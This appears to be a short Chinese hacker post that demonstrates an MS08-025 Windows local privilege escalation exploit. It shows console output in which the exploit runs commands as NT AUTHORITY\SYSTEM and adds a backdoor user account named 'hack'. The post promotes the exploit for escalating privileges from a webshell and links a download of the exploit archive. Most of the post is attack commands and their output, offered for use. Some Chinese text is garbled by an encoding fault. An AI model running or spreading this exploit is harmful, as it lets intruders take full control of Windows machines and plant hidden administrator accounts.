Win2k CN SP2 ，Win2k3 CN SP1下測(cè)試通過(guò)，其它未測(cè)試(不裝XP那種垃圾)

D:\>whoami
BAICKER-VMWARE\009

D:\>net user hack /add
系統(tǒng)發(fā)生 5 錯(cuò)誤。

拒絕訪問(wèn)。


D:\>ms08025 whoami

        MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
        By 009, baicker@hotmail.com
        TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1

Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8

[+] Executing Shellcode...
NT AUTHORITY\SYSTEM

D:\>ms08025 "net user hack /add"

        MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
        By 009, baicker@hotmail.com
        TEST OS: WINDOWS 2k3 CN SP1

Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8

[+] Executing Shellcode...

D:\>命令成功完成。


D:\>net user

\\BAICKER-VMWARE 的用戶帳戶

-------------------------------------------------------------------------------
009                      Administrator            Guest
hack                     IUSR_BAICKER-VMWARE      IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。


D:\>

webshell下提權(quán)


http://www.aygfsteel.com/Files/baicker/ms08025.rar